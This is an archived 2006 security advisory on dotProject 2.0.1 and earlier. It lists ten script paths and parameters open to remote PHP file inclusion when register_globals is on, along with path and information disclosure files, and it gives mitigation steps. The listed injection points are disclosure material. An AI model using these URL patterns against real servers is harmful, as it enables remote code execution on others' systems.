dotProject-2.0.1.txt

dotProject-2.0.1.txt: Posted Feb 14, 2006; Authored by Robin Verton; dotProject versions 2.0.1 and below are vulnerable to multiple arbitrary code execution and information disclosure problems.; tags | exploit, arbitrary, code execution, info disclosure; SHA-256 | 65d278cfd1e0fb5de0c01a4650d9eb60a82d1f8ca72d701d3d4d18e7db65063f; Download | Favorite | View

dotProject-2.0.1.txt

dotproject <= 2.0.1 remote code execution
======================================

  Software: dotProject <= 2.0.1
     Severity: Arbitrary code execution, Path/Information Disclosure
     Risk: High
     Author: Robin Verton <r.verton@gmail.com>
     Date: Feb. 14 2006
     Vendor: dotproject.net [contacted]

  Description:
   dotProject is a volunteer supported Project Management application.

  Details:
   The 'protection.php' script does not properly validate user-supplied input in the 'siteurl' parameter.
   Some user-supplied input is not checked correctly so an attacker can include a remote php file and
   execute arbitrary phpcode or arbitrary system command via eval().

   Because there are over 10 Bugs I only post the vulnerable files + parameters which are not checked.
   To exploit these vulnerables register_globals have to be set ON (default).

   1) /includes/db_adodb.php?baseDir=[REMOTE INCLUDE]
 
   2) /includes/db_connect.php?baseDir=[REMOTE INCLUDE]
 
   3) /includes/session.php?baseDir=[REMOTE INCLUDE]
   
   4) /modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]
 
   5) /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]
 
   6) /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]
 
   7) /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]
 
   8) /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]
 
   9) /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]
 
   10) /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]

   There are also some path discolsure bugs:

   Nearly ALL files in /db/ give out some nice php-errors by accessing them directly with the parameter
   baseDir=foobar.

   Then, if the /doc/ directory is not deleted (default) you can access to two varoius files which
   disclose you some system informations:

   1) /docs/phpinfo.php - A phpinfo() file.
 
   2) /docs/check.php - Some more informations about the installed dotProject.

  Solution:
   Turn register_globals OFF, delete the /docs/ dir and cover /db/ dir with an htaccess.

  Timeline:
   24.01.2006 - Bugs found
   26.01.2006 - Vendor Contacted
   14.02.2006 - Publishing

  Credits:
   Credits go to Robin Verton (r.verton [at] gmail [dot] com)

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

dotProject-2.0.1.txt

dotProject-2.0.1.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

dotProject-2.0.1.txt

Share This

dotProject-2.0.1.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems